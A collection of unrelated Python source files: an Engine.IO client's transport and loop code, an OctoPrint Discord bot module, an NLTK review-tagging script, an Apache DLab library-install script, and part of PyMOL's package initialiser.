self.transports = transports or valid_transports
self.queue = self.create_queue()
return getattr(self, '_connect_' + self.transports[0])(
url, headers or {}, engineio_path)
def wait(self):
"""Wait until the connection with the server ends.
Client applications can use this function to block the main thread
during the life of the connection.
"""
if self.read_loop_task:
self.read_loop_task.join()
def send(self, data, binary=None):
"""Send a message to a client.
:param data: The data to send to the client. Data can be of type
``str``, ``bytes``, ``list`` or ``dict``. If a ``list``
or ``dict``, the data will be serialized as JSON.
:param binary: ``True`` to send packet as binary, ``False`` to send
as text. If not given, unicode (Python 2) and str
(Python 3) are sent as text, and str (Python 2) and
bytes (Python 3) are sent as binary.
"""
self._send_packet(packet.Packet(packet.MESSAGE, data=data,
binary=binary))
def disconnect(self, abort=False):
"""Disconnect from the server.
:param abort: If set to ``True``, do not wait for background tasks
associated with the connection to end.
"""
if self.state == 'connected':
self._send_packet(packet.Packet(packet.CLOSE))
self.queue.put(None)
self.state = 'disconnecting'
self._trigger_event('disconnect', run_async=False)
if self.current_transport == 'websocket':
self.ws.close()
if not abort:
self.read_loop_task.join()
self.state = 'disconnected'
try:
connected_clients.remove(self)
except ValueError: # pragma: no cover
pass
self._reset()
def transport(self):
"""Return the name of the transport currently in use.
The possible values returned by this function are ``'polling'`` and
``'websocket'``.
"""
return self.current_transport
def start_background_task(self, target, *args, **kwargs):
"""Start a background task.
This is a utility function that applications can use to start a
background task.
:param target: the target function to execute.
:param args: arguments to pass to the function.
:param kwargs: keyword arguments to pass to the function.
This function returns an object compatible with the `Thread` class in
the Python standard library. The `start()` method on this object is
already called by this function.
"""
th = threading.Thread(target=target, args=args, kwargs=kwargs)
th.start()
return th
def sleep(self, seconds=0):
"""Sleep for the requested amount of time."""
return time.sleep(seconds)
def create_queue(self, *args, **kwargs):
"""Create a queue object."""
q = queue.Queue(*args, **kwargs)
q.Empty = queue.Empty
return q
def create_event(self, *args, **kwargs):
"""Create an event object."""
return threading.Event(*args, **kwargs)
def _reset(self):
self.state = 'disconnected'
self.sid = None
def _connect_polling(self, url, headers, engineio_path):
"""Establish a long-polling connection to the Engine.IO server."""
if requests is None: # pragma: no cover
# not installed
self.logger.error('requests package is not installed -- cannot '
'send HTTP requests!')
return
self.base_url = self._get_engineio_url(url, engineio_path, 'polling')
self.logger.info('Attempting polling connection to ' + self.base_url)
r = self._send_request(
'GET', self.base_url + self._get_url_timestamp(), headers=headers,
timeout=self.request_timeout)
if r is None:
self._reset()
raise exceptions.ConnectionError(
'Connection refused by the server')
if r.status_code < 200 or r.status_code >= 300:
self._reset()
raise exceptions.ConnectionError(
'Unexpected status code {} in server response'.format(
r.status_code), r.json())
try:
p = payload.Payload(encoded_payload=r.content)
except ValueError:
six.raise_from(exceptions.ConnectionError(
'Unexpected response from server'), None)
open_packet = p.packets[0]
if open_packet.packet_type != packet.OPEN:
raise exceptions.ConnectionError(
'OPEN packet not returned by server')
self.logger.info(
'Polling connection accepted with ' + str(open_packet.data))
self.sid = open_packet.data['sid']
self.upgrades = open_packet.data['upgrades']
self.ping_interval = open_packet.data['pingInterval'] / 1000.0
self.ping_timeout = open_packet.data['pingTimeout'] / 1000.0
self.current_transport = 'polling'
self.base_url += '&sid=' + self.sid
self.state = 'connected'
connected_clients.append(self)
self._trigger_event('connect', run_async=False)
for pkt in p.packets[1:]:
self._receive_packet(pkt)
if 'websocket' in self.upgrades and 'websocket' in self.transports:
# attempt to upgrade to websocket
if self._connect_websocket(url, headers, engineio_path):
# upgrade to websocket succeeded, we're done here
return
# start background tasks associated with this client
self.ping_loop_task = self.start_background_task(self._ping_loop)
self.write_loop_task = self.start_background_task(self._write_loop)
self.read_loop_task = self.start_background_task(
self._read_loop_polling)
def _connect_websocket(self, url, headers, engineio_path):
"""Establish or upgrade to a WebSocket connection with the server."""
if websocket is None: # pragma: no cover
# not installed
self.logger.warning('websocket-client package not installed, only '
'polling transport is available')
return False
websocket_url = self._get_engineio_url(url, engineio_path, 'websocket')
if self.sid:
self.logger.info(
'Attempting WebSocket upgrade to ' + websocket_url)
upgrade = True
websocket_url += '&sid=' + self.sid
else:
upgrade = False
self.base_url = websocket_url
self.logger.info(
'Attempting WebSocket connection to ' + websocket_url)
# get cookies and other settings from the long-polling connection
# so that they are preserved when connecting to the WebSocket route
cookies = None
extra_options = {}
if self.http:
# cookies
cookies = '; '.join(["{}={}".format(cookie.name, cookie.value)
for cookie in self.http.cookies])
for header, value in headers.items():
if header.lower() == 'cookie':
if cookies:
cookies += '; '
cookies += value
del headers[header]
break
# auth
if 'Authorization' not in headers and self.http.auth is not None:
if not isinstance(self.http.auth, tuple): # pragma: no cover
raise ValueError('Only basic authentication is supported')
basic_auth = '{}:{}'.format(
self.http.auth[0], self.http.auth[1]).encode('utf-8')
basic_auth = b64encode(basic_auth).decode('utf-8')
headers['Authorization'] = 'Basic ' + basic_auth
# cert
# this can be given as ('certfile', 'keyfile') or just 'certfile'
if isinstance(self.http.cert, tuple):
extra_options['sslopt'] = {
'certfile': self.http.cert[0],
'keyfile': self.http.cert[1]}
elif self.http.cert:
extra_options['sslopt'] = {'certfile': self.http.cert}
# proxies
if self.http.proxies:
proxy_url = None
if websocket_url.startswith('ws://'):
proxy_url = self.http.proxies.get(
'ws', self.http.proxies.get('http'))
else: # wss://
proxy_url = self.http.proxies.get(
'wss', self.http.proxies.get('https'))
if proxy_url:
parsed_url = urllib.parse.urlparse(
proxy_url if '://' in proxy_url
else 'scheme://' + proxy_url)
print(parsed_url)
extra_options['http_proxy_host'] = parsed_url.hostname
extra_options['http_proxy_port'] = parsed_url.port
extra_options['http_proxy_auth'] = (
(parsed_url.username, parsed_url.password)
if parsed_url.username or parsed_url.password
else None)
# verify
if not self.http.verify:
self.ssl_verify = False
if not self.ssl_verify:
extra_options['sslopt'] = {"cert_reqs": ssl.CERT_NONE}
try:
ws = websocket.create_connection(
websocket_url + self._get_url_timestamp(), header=headers,
cookie=cookies, enable_multithread=True, **extra_options)
except (ConnectionError, IOError, websocket.WebSocketException):
if upgrade:
self.logger.warning(
'WebSocket upgrade failed: connection error')
return False
else:
raise exceptions.ConnectionError('Connection error')
if upgrade:
p = packet.Packet(packet.PING,
data=six.text_type('probe')).encode()
try:
ws.send(p)
except Exception as e: # pragma: no cover
self.logger.warning(
'WebSocket upgrade failed: unexpected send exception: %s',
str(e))
return False
try:
p = ws.recv()
except Exception as e: # pragma: no cover
self.logger.warning(
'WebSocket upgrade failed: unexpected recv exception: %s',
str(e))
return False
pkt = packet.Packet(encoded_packet=p)
if pkt.packet_type != packet.PONG or pkt.data != 'probe':
self.logger.warning(
'WebSocket upgrade failed: no PONG packet')
return False
p = packet.Packet(packet.UPGRADE).encode()
try:
ws.send(p)
except Exception as e: # pragma: no cover
self.logger.warning(
'WebSocket upgrade failed: unexpected send exception: %s',
str(e))
return False
self.current_transport = 'websocket'
self.logger.info('WebSocket upgrade was successful')
else:
try:
p = ws.recv()
except Exception as e: # pragma: no cover
raise exceptions.ConnectionError(
'Unexpected recv exception: ' + str(e))
open_packet = packet.Packet(encoded_packet=p)
if open_packet.packet_type != packet.OPEN:
raise exceptions.ConnectionError('no OPEN packet')
self.logger.info(
'WebSocket connection accepted with ' + str(open_packet.data))
self.sid = open_packet.data['sid']
self.upgrades = open_packet.data['upgrades']
self.ping_interval = open_packet.data['pingInterval'] / 1000.0
self.ping_timeout = open_packet.data['pingTimeout'] / 1000.0
self.current_transport = 'websocket'
self.state = 'connected'
connected_clients.append(self)
self._trigger_event('connect', run_async=False)
self.ws = ws
# start background tasks associated with this client
self.ping_loop_task = self.start_background_task(self._ping_loop)
self.write_loop_task = self.start_background_task(self._write_loop)
self.read_loop_task = self.start_background_task(
self._read_loop_websocket)
return True
def _receive_packet(self, pkt):
"""Handle incoming packets from the server."""
packet_name = packet.packet_names[pkt.packet_type] \
if pkt.packet_type < len(packet.packet_names) else 'UNKNOWN'
self.logger.info(
'Received packet %s data %s', packet_name,
pkt.data if not isinstance(pkt.data, bytes) else '<binary>')
if pkt.packet_type == packet.MESSAGE:
self._trigger_event('message', pkt.data, run_async=True)
elif pkt.packet_type == packet.PONG:
self.pong_received = True
elif pkt.packet_type == packet.CLOSE:
self.disconnect(abort=True)
elif pkt.packet_type == packet.NOOP:
pass
else:
self.logger.error('Received unexpected packet of type %s',
pkt.packet_type)
def _send_packet(self, pkt):
"""Queue a packet to be sent to the server."""
if self.state != 'connected':
return
self.queue.put(pkt)
self.logger.info(
'Sending packet %s data %s',
packet.packet_names[pkt.packet_type],
pkt.data if not isinstance(pkt.data, bytes) else '<binary>')
def _send_request(
self, method, url, headers=None, body=None,
timeout=None): # pragma: no cover
if self.http is None:
self.http = requests.Session()
try:
return self.http.request(method, url, headers=headers, data=body,
timeout=timeout, verify=self.ssl_verify)
except requests.exceptions.RequestException as exc:
self.logger.info('HTTP %s request to %s failed with error %s.',
method, url, exc)
def _trigger_event(self, event, *args, **kwargs):
"""Invoke an event handler."""
run_async = kwargs.pop('run_async', False)
if event in self.handlers:
if run_async:
return self.start_background_task(self.handlers[event], *args)
else:
try:
return self.handlers[event](*args)
except:
self.logger.exception(event + ' handler error')
def _get_engineio_url(self, url, engineio_path, transport):
"""Generate the Engine.IO connection URL."""
engineio_path = engineio_path.strip('/')
parsed_url = urllib.parse.urlparse(url)
if transport == 'polling':
scheme = 'http'
elif transport == 'websocket':
scheme = 'ws'
else: # pragma: no cover
raise ValueError('invalid transport')
if parsed_url.scheme in ['https', 'wss']:
scheme += 's'
return ('{scheme}://{netloc}/{path}/?{query}'
'{sep}transport={transport}&EIO=3').format(
scheme=scheme, netloc=parsed_url.netloc,
path=engineio_path, query=parsed_url.query,
sep='&' if parsed_url.query else '',
transport=transport)
def _get_url_timestamp(self):
"""Generate the Engine.IO query string timestamp."""
return '&t=' + str(time.time())
def _ping_loop(self):
"""This background task sends a PING to the server at the requested
interval.
"""
self.pong_received = True
if self.ping_loop_event is None:
self.ping_loop_event = self.create_event()
else:
self.ping_loop_event.clear()
while self.state == 'connected':
if not self.pong_received:
self.logger.info(
'PONG response has not been received, aborting')
if self.ws:
self.ws.close(timeout=0)
self.queue.put(None)
break
self.pong_received = False
self._send_packet(packet.Packet(packet.PING))
self.ping_loop_event.wait(timeout=self.ping_interval)
self.logger.info('Exiting ping task')
def _read_loop_polling(self):
"""Read packets by polling the Engine.IO server."""
while self.state == 'connected':
self.logger.info(
'Sending polling GET request to ' + self.base_url)
r = self._send_request(
'GET', self.base_url + self._get_url_timestamp(),
timeout=max(self.ping_interval, self.ping_timeout) + 5)
if r is None:
self.logger.warning(
'Connection refused by the server, aborting')
self.queue.put(None)
break
if r.status_code < 200 or r.status_code >= 300:
self.logger.warning('Unexpected status code %s in server '
'response, aborting', r.status_code)
self.queue.put(None)
break
try:
p = payload.Payload(encoded_payload=r.content)
except ValueError:
self.logger.warning(
'Unexpected packet from server, aborting')
self.queue.put(None)
break
for pkt in p.packets:
self._receive_packet(pkt)
self.logger.info('Waiting for write loop task to end')
self.write_loop_task.join()
self.logger.info('Waiting for ping loop task to end')
if self.ping_loop_event: # pragma: no cover
self.ping_loop_event.set()
self.ping_loop_task.join()
if self.state == 'connected':
self._trigger_event('disconnect', run_async=False)
try:
connected_clients.remove(self)
except ValueError: # pragma: no cover
pass
self._reset()
self.logger.info('Exiting read loop task')
def _read_loop_websocket(self):
"""Read packets from the Engine.IO WebSocket connection."""
while self.state == 'connected':
p = None
try:
p = self.ws.recv()
except websocket.WebSocketConnectionClosedException:
self.logger.warning(
'WebSocket connection was closed, aborting')
self.queue.put(None)
break
except Exception as e:
self.logger.info(
'Unexpected error receiving packet: "%s", aborting',
str(e))
self.queue.put(None)
break
if isinstance(p, six.text_type): # pragma: no cover
p = p.encode('utf-8')
try:
pkt = packet.Packet(encoded_packet=p)
except Exception as e: # pragma: no cover
self.logger.info(
'Unexpected error decoding packet: "%s", aborting', str(e))
self.queue.put(None)
break
self._receive_packet(pkt)
self.logger.info('Waiting for write loop task to end')
self.write_loop_task.join()
self.logger.info('Waiting for ping loop task to end')
if self.ping_loop_event: # pragma: no cover
self.ping_loop_event.set()
self.ping_loop_task.join()
if self.state == 'connected':
self._trigger_event('disconnect', run_async=False)
try:
connected_clients.remove(self)
except ValueError: # pragma: no cover
pass
self._reset()
self.logger.info('Exiting read loop task')
def _write_loop(self):
"""This background task sends packages to the server as they are
pushed to the send queue.
"""
while self.state == 'connected':
# to simplify the timeout handling, use the maximum of the
# ping interval and ping timeout as timeout, with an extra 5
# seconds grace period
timeout = max(self.ping_interval, self.ping_timeout) + 5
packets = None
try:
packets = [self.queue.get(timeout=timeout)]
except self.queue.Empty:
self.logger.error('packet queue is empty, aborting')
break
if packets == [None]:
self.queue.task_done()
packets = []
else:
while True:
try:
packets.append(self.queue.get(block=False))
except self.queue.Empty:
break
if packets[-1] is None:
packets = packets[:-1]
self.queue.task_done()
break
if not packets:
# empty packet list returned -> connection closed
break
if self.current_transport == 'polling':
p = payload.Payload(packets=packets)
r = self._send_request(
'POST', self.base_url, body=p.encode(),
headers={'Content-Type': 'application/octet-stream'},
timeout=self.request_timeout)
for pkt in packets:
self.queue.task_done()
if r is None:
self.logger.warning(
'Connection refused by the server, aborting')
break
if r.status_code < 200 or r.status_code >= 300:
self.logger.warning('Unexpected status code %s in server '
'response, aborting', r.status_code)
self._reset()
break
else:
# websocket
try:
for pkt in packets:
encoded_packet = pkt.encode(always_bytes=False)
if pkt.binary:
self.ws.send_binary(encoded_packet)
else:
self.ws.send(encoded_packet)
self.queue.task_done()
except websocket.WebSocketConnectionClosedException:
self.logger.warning(
'WebSocket connection was closed, aborting')
break
self.logger.info('Exiting write loop task')
|
discordimpl.py
|
# coding: utf-8
# Simple module to send messages through a Discord WebHook
# post a message to discord api via a bot
# bot must be added to the server and have write access to the channel
import asyncio
from asyncio import Event
import re
import time
from threading import Thread
from typing import Optional, Tuple, List
from unittest.mock import Mock
import discord
from discord.embeds import Embed
from discord.file import File
from octoprint_discordremote import Command
# Constants
CHANNEL_ID_LENGTH = 18
BOT_TOKEN_LENGTH = 59
class DiscordImpl:
class AsyncIOEventWrapper:
def __init__(self, event: Optional[Event] = None):
self.set_state = False
self.event = event
def set_event(self, event: Optional[Event]):
self.event = event
if self.set_state:
self.event.set()
else:
self.event.clear()
def is_set(self) -> bool:
if self.event is None:
return self.set_state
return self.event.is_set()
async def wait(self):
while self.event is None:
await asyncio.sleep(1)
await self.event.wait()
def set(self):
if self.event:
self.event.set()
else:
self.set_state = True
def clear(self):
if self.event:
self.event.clear()
else:
self.set_state = False
def __init__(self):
self.logger = None
self.channel_id: int = 0 # enable dev mode on discord, right-click on the channel, copy ID
self.bot_token: str = "" # get from the bot page. must be a bot, not a discord app
self.loop = None
self.client: Optional[discord.Client] = None
self.running_thread: Optional[Thread] = None
self.command: Optional[Command] = None
self.shutdown_event: DiscordImpl.AsyncIOEventWrapper = DiscordImpl.AsyncIOEventWrapper(None)
self.message_queue: List[List[Tuple[Embed, File]]] = []
self.thread: Optional[Thread] = None
self.process_queue: DiscordImpl.AsyncIOEventWrapper = DiscordImpl.AsyncIOEventWrapper(None)
def configure_discord(self, bot_token: str, channel_id: str, logger, command: Command, status_callback=None):
self.bot_token = bot_token
self.channel_id = int(channel_id)
if logger:
self.logger = logger
self.command = command
if len(str(self.channel_id)) != CHANNEL_ID_LENGTH:
self.logger.error("Incorrectly configured: Channel ID must be %d chars long." % CHANNEL_ID_LENGTH)
return
if self.bot_token is None or len(self.bot_token) != BOT_TOKEN_LENGTH:
self.logger.error("Incorrectly configured: Bot Token must be %d chars long." % BOT_TOKEN_LENGTH)
return
self.thread = Thread(target=self.run_thread)
self.thread.start()
while self.loop is None:
time.sleep(0.1)
def run_thread(self):
asyncio.set_event_loop(asyncio.new_event_loop())
loop = asyncio.get_event_loop()
loop.add_signal_handler = Mock()
self.client = discord.Client()
@self.client.event
async def on_message(message):
await self.handle_message(message)
@self.client.event
async def on_ready():
self.logger.info("Sending msgs")
asyncio.create_task(self.process_message_queue())
try:
self.loop = asyncio.get_event_loop()
# Create proper events now that we have an event loop.
self.shutdown_event.set_event(Event())
self.process_queue.set_event(Event())
future = self.client.run(self.bot_token)
self.loop.run_until_complete(asyncio.wait([future]))
except RuntimeError as e:
self.logger.info("Failed with: %s" % e)
except Exception as e:
self.logger.error("Failed with: %s" % e)
def update_presence(self, msg):
try:
if self.client.ws:
self.loop.create_task(
self.client.change_presence(activity=discord.Activity(url='http://octoprint.url', name=msg)))
except:
pass
async def send_messages(self):
try:
while len(self.message_queue):
message_pairs = self.message_queue[0]
channel = self.client.get_channel(int(self.channel_id))
for embed, snapshot in message_pairs:
await channel.send(embed=embed, file=snapshot)
del self.message_queue[0]
if len(self.message_queue) == 0:
self.process_queue.clear()
except Exception as e:
self.logger.error("Failed with: %s" % e)
async def process_message_queue(self):
while not self.shutdown_event.is_set():
await self.send_messages()
if len(self.message_queue) != 0:
await asyncio.sleep(10)
continue
await self.process_queue.wait()
def send(self, messages: List[Tuple[Optional[Embed], Optional[File]]]):
self.message_queue.append(messages)
self.process_queue.set()
def log_safe(self, message):
return message.replace(self.bot_token, "[bot_token]").replace(self.channel_id, "[channel_id]")
async def handle_message(self, message):
if message.channel.id != self.channel_id:
# Only care about messages from correct channel
return
self.logger.debug("Message is: %s" % message)
user = message.author.id
if user == self.client.user.id:
# Don't respond to ourself.
return
if message.author.bot:
# Don't respond to bots.
return
for upload in message.attachments:
filename = upload.filename
url = upload.url
if re.match(r"^[\w,\s-]+\.(?:g|gco|gcode|zip(?:\.[\d]*)?)$", filename):
messages = self.command.download_file(filename, url, user)
self.send(messages)
if len(message.content) > 0:
messages = self.command.parse_command(message.content, user)
self.send(messages)
def shutdown_discord(self):
self.shutdown_event.set()
self.process_queue.set()
if self.loop:
self.loop.stop()
|
reviews_parallel.py
|
import multiprocessing
import time
import sys
import nltk
from pymongo import MongoClient
from settings import Settings
def load_stopwords():
stopwords = {}
with open('stopwords.txt', 'rU') as f:
for line in f:
stopwords[line.strip()] = 1
return stopwords
def worker(identifier, skip, count):
done = 0
start = time.time()
stopwords = load_stopwords()
reviews_collection = MongoClient(Settings.MONGO_CONNECTION_STRING)[Settings.REVIEWS_DATABASE][
Settings.REVIEWS_COLLECTION]
tags_collection = MongoClient(Settings.MONGO_CONNECTION_STRING)[Settings.TAGS_DATABASE][
Settings.REVIEWS_COLLECTION]
batch_size = 50
for batch in range(0, count, batch_size):
reviews_cursor = reviews_collection.find().skip(skip + batch).limit(batch_size)
for review in reviews_cursor:
words = []
sentences = nltk.sent_tokenize(review["text"].lower())
for sentence in sentences:
tokens = nltk.word_tokenize(sentence)
text = [word for word in tokens if word not in stopwords]
tagged_text = nltk.pos_tag(text)
for word, tag in tagged_text:
words.append({"word": word, "pos": tag})
tags_collection.insert({
"reviewId": review["reviewId"],
"business": review["business"],
"text": review["text"],
"words": words
})
done += 1
if done % 100 == 0:
end = time.time()
print 'Worker' + str(identifier) + ': Done ' + str(done) + ' out of ' + str(count) + ' in ' + (
"%.2f" % (end - start)) + ' sec ~ ' + ("%.2f" % (done / (end - start))) + '/sec'
sys.stdout.flush()
def main():
reviews_collection = MongoClient(Settings.MONGO_CONNECTION_STRING)[Settings.REVIEWS_DATABASE][
Settings.REVIEWS_COLLECTION]
reviews_cursor = reviews_collection.find()
count = reviews_cursor.count()
workers = 3
batch = count / workers
left = count % workers
jobs = []
for i in range(workers):
size = count / workers
if i == (workers - 1):
size += left
p = multiprocessing.Process(target=worker, args=((i + 1), i * batch, size))
jobs.append(p)
p.start()
for j in jobs:
j.join()
print '%s.exitcode = %s' % (j.name, j.exitcode)
if __name__ == '__main__':
main()
|
dataengine-service_install_libs.py
|
#!/usr/bin/python
# *****************************************************************************
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
# ******************************************************************************
import os
import sys
import logging
import traceback
from dlab.fab import *
from dlab.meta_lib import *
from dlab.actions_lib import *
from fabric.api import *
import multiprocessing
def install_libs(instance, data_engine):
data_engine['instance_ip'] = instance.get('PrivateIpAddress')
params = '--os_user {} --instance_ip {} --keyfile "{}" --libs "{}"'\
.format(data_engine['os_user'], data_engine['instance_ip'],
data_engine['keyfile'], data_engine['libs'])
try:
# Run script to install additional libs
local("~/scripts/{}.py {}".format('install_additional_libs', params))
except:
traceback.print_exc()
raise Exception
if __name__ == "__main__":
create_aws_config_files()
instance_class = 'notebook'
local_log_filename = "{}_{}_{}.log".format(os.environ['conf_resource'], os.environ['edge_user_name'],
os.environ['request_id'])
local_log_filepath = "/logs/" + os.environ['conf_resource'] + "/" + local_log_filename
logging.basicConfig(format='%(levelname)-8s [%(asctime)s] %(message)s',
level=logging.DEBUG,
filename=local_log_filepath)
try:
logging.info('[INSTALLING ADDITIONAL LIBRARIES ON DATAENGINE-SERVICE]')
print('[INSTALLING ADDITIONAL LIBRARIES ON DATAENGINE-SERVICE]')
data_engine = dict()
try:
data_engine['os_user'] = 'ec2-user'
data_engine['cluster_name'] = os.environ['computational_id']
data_engine['cluster_id'] = get_emr_id_by_name(data_engine['cluster_name'])
data_engine['cluster_instances'] = get_emr_instances_list(data_engine['cluster_id'])
data_engine['keyfile'] = '{}{}.pem'.format(os.environ['conf_key_dir'], os.environ['conf_key_name'])
data_engine['libs'] = os.environ['libs']
except Exception as err:
print('Error: {0}'.format(err))
append_result("Failed to get parameter.", str(err))
sys.exit(1)
try:
jobs = []
for instance in data_engine['cluster_instances']:
p = multiprocessing.Process(target=install_libs, args=(instance, data_engine))
jobs.append(p)
p.start()
for job in jobs:
job.join()
for job in jobs:
if job.exitcode != 0:
raise Exception
except:
traceback.print_exc()
raise Exception
except Exception as err:
print('Error: {0}'.format(err))
append_result("Failed to install additional libraries.", str(err))
sys.exit(1)
|
__init__.py
|
'''
PyMOL Molecular Graphics System
Copyright (c) Schrodinger, Inc.
Supported ways to launch PyMOL:
If $PYMOL_PATH is a non-default location, it must be set and exported
before launching PyMOL.
From a terminal:
shell> python /path/to/pymol/__init__.py [args]
If the 'pymol' module is in PYTHONPATH
shell> python -m pymol [args]
From a python main thread:
>>> # blocks the interpreter
>>> import pymol
>>> pymol.launch()
From a python main thread, spawning a new thread:
>>> # with GUI
>>> # THIS IS NOT SUPPORTED ON macOS
>>> import pymol
>>> pymol.finish_launching()
>>> # without GUI
>>> import pymol
>>> pymol.finish_launching(['pymol', '-cq'])
'''
import os
import sys
import __main__
if __name__ == '__main__':
# PyMOL launched as "python pymol/__init__.py"
# or via execfile(".../pymol/__init__.py",...) from main
# or as "python -m pymol.__init__"
if 'pymol' not in sys.modules:
# "python /abc/pymol/__init__.py" will add /abc/pymol to PYTHONPATH
# (we don't want that), but not /abc and not the current directory (we
# want those)
pymol_base = os.path.dirname(os.path.realpath(__file__))
site_packages = os.path.dirname(pymol_base)
# remove /abc/pymol
if pymol_base in sys.path:
sys.path.remove(pymol_base)
# add /abc
if site_packages not in sys.path:
sys.path.insert(0, site_packages)
# add current directory
if '' not in sys.path:
sys.path.insert(0, '')
# arguments default to sys.argv... but also support execfile(...)
# from a terminal where the user could set pymol_argv
args = getattr(__main__, "pymol_argv", None)
# standard launch (consume main thread)
import pymol
sys.exit(pymol.launch(args))
IS_WINDOWS = sys.platform.startswith('win')
IS_MACOS = sys.platform.startswith('darwin')
IS_LINUX = sys.platform.startswith('linux')
import _thread as thread
import copy
import threading
import re
import time
import traceback
import math
from . import invocation
from . import colorprinting
def _init_internals(_pymol):
# Create a temporary object "stored" in the PyMOL global namespace
# for usage with evaluate based-commands such as alter
_pymol.stored = Scratch_Storage()
# Create a permanent object in the PyMOL global namespace
# that will be picked and unpickled along with the session
_pymol.session = Session_Storage()
# This global will be non-None if logging is active
# (global variable used for efficiency)
_pymol._log_file = None
# This global will be non-None if an external gui
# exists. It mainly exists so that events which occur
# in the Python thread can be handed off to the
# external GUI thread through one or more FIFO Queues
# (global variable used for efficiency)
_pymol._ext_gui = None
# lists of functions to call when saving and restoring pymol session objects
_pymol._session_save_tasks = []
_pymol._session_restore_tasks = []
# cached results (as a list):
# [ [size, (hash1, hash2, ... ), (inp1, inp2, ...), output],
# [size, (hash1, hash2, ... ), (inp1, inp2, ...), output],
# ... ]
_pymol._cache = []
# standard input reading thread
_pymol._stdin_reader_thread = None
# stored views
_pymol._view_dict = {}
_pymol._view_dict_sc = None
# stored scenes
_pymol._scene_quit_on_action = ''
# get us a private invocation pseudo-module
_pymol._invocation = Scratch_Storage()
_pymol._invocation.options = copy.deepcopy(invocation.options)
_pymol._invocation.get_user_config = invocation.get_user_config
_pymol._invocation.parse_args = invocation.parse_args
# these locks are to be shared by all PyMOL instances within a
# single Python interpeter
_pymol.lock_api = threading.RLock() # mutex for API calls from the outside
_pymol.lock_api_status = threading.RLock() # mutex for PyMOL status info
_pymol.lock_api_glut = threading.RLock() # mutex for GLUT avoidance
_pymol.lock_api_data = threading.RLock() # mutex for internal data structures
def get_version_message(v=None):
'''
Get an informative product + version string
'''
if not v:
v = _cmd.get_version()
p = "PyMOL %s " % v[0]
p += "Incentive Product" if invocation.options.incentive_product else \
"Open-Source"
if v[4]:
p += ' (' + v[4][:10] + ')'
if v[3]:
p += ', ' + time.strftime('%Y-%m-%d', time.localtime(v[3]))
return p
def guess_pymol_path():
'''
Guess PYMOL_PATH from typical locations and return it as string.
'''
init_file = os.path.abspath(__file__)
pymol_path_candidates = [
# $PYMOL_PATH == <site-packages>/pymol/pymol_path
os.path.join(os.path.dirname(init_file), 'pymol_path'),
# $PYMOL_PATH/modules/pymol/__init__.py
re.sub(r"[\/\\]modules[\/\\]pymol[\/\\]__init__\.py[c]*$", "", init_file),
# /usr/share/pymol
os.path.join(sys.prefix, 'share', 'pymol'),
# venv --system-site-packages (experimental)
os.path.join(sys.base_prefix, 'share', 'pymol'),
]
for pymol_path in pymol_path_candidates:
if os.path.isdir(pymol_path):
return pymol_path
return '.'
def setup_environ():
# guess PYMOL_PATH if unset
if 'PYMOL_PATH' not in os.environ:
os.environ['PYMOL_PATH'] = guess_pymol_path()
# other PyMOL variables
if 'PYMOL_DATA' not in os.environ:
os.environ['PYMOL_DATA'] = os.path.join(os.environ['PYMOL_PATH'], 'data')
if 'PYMOL_SCRIPTS' not in os.environ:
os.environ['PYMOL_SCRIPTS'] = os.path.join(os.environ['PYMOL_PATH'], 'scripts')
os.environ['TUT'] = os.path.join(os.environ['PYMOL_DATA'], 'tut')
# set Tcl/Tk environment if we ship it in ext/lib
pymol_path = os.environ['PYMOL_PATH']
for varname, dirname in [
('TCL_LIBRARY', 'tcl8.5'),
('TK_LIBRARY', 'tk8.5')]:
dirname = os.path.join(pymol_path, "ext", "lib", dirname)
if os.path.isdir(dirname):
os.environ[varname] = dirname
def exec_str(self, string):
'''
Execute string in "self" namespace (used from C)
'''
try:
exec(string, self.__dict__, self.__dict__)
except Exception:
traceback.print_exc()
return None
def exec_deferred(self):
'''
Execute the stuff from invocations.options.deferred
'''
try:
from socket import error as socket_error
except ImportError:
socket_error = None
print('import socket failed')
cmd = self.cmd
_pymol = cmd._pymol
# read from stdin (-p)
if self.invocation.options.read_stdin and not _pymol._stdin_reader_thread:
try:
t = _pymol._stdin_reader_thread = \
threading.Thread(target=cmd._parser.stdin_reader)
t.setDaemon(1)
t.start()
except:
traceback.print_exc()
# do the deferred stuff
try:
if cmd.ready():
cmd.config_mouse(quiet=1)
for a in self.invocation.options.deferred:
if a[0:4] == "_do_":
cmd.do(a[4:])
else:
cmd.load(a, quiet=0)
except CmdException as e:
colorprinting.error(str(e))
colorprinting.error(
" Error: Argument processing aborted due to exception (above).")
except socket_error:
# this (should) only happen if we're opening a PWG file on startup
# and the port is busy. For now, simply bail...
cmd.wizard("message",["Socket.error: ","",
"\\999Assigned socket in use.","",
"\\779Is PyMOL already launched?","",
"\\966Shutting down..."])
cmd.refresh()
cmd.do("time.sleep(2);cmd.quit()")
def adapt_to_hardware(self):
'''
optimize for (or workaround) specific hardware
'''
cmd = self.cmd
vendor, renderer, version = cmd.get_renderer()
# Quadro cards don't support GL_BACK in stereo contexts
if vendor.startswith('NVIDIA'):
if 'Quadro' in renderer:
if invocation.options.show_splash:
print(" Adapting to Quadro hardware.")
cmd.set('stereo_double_pump_mono', 1)
elif vendor.startswith('Mesa'):
if renderer[0:18]=='Mesa GLX Indirect':
pass
elif vendor.startswith('ATI'):
if renderer[0:17] == 'FireGL2 / FireGL3': # obsolete ?
if invocation.options.show_splash:
print(" Adapting to FireGL hardware.")
cmd.set('line_width', 2, quiet=1)
if IS_WINDOWS:
if sys.getwindowsversion()[0] > 5:
# prevent color corruption by calling glFlush etc.
cmd.set('ati_bugs', 1)
if 'Radeon HD' in renderer:
if invocation.options.show_splash:
print(" Adjusting settings to improve performance for ATI cards.")
if cmd.get_setting_int("use_shaders")==0:
# limit frame rate to 30 fps to avoid ATI "jello"
# where screen updates fall way behind the user.
cmd.set("max_ups", 30)
elif vendor.startswith('Microsoft'):
if renderer[0:17] == 'GDI Generic':
cmd.set('light_count', 1)
cmd.set('spec_direct', 0.7)
elif vendor.startswith("Intel"):
if "Express" in renderer:
if invocation.options.show_splash:
print(" Disabling shaders for Intel Express graphics")
cmd.set("use_shaders", 0)
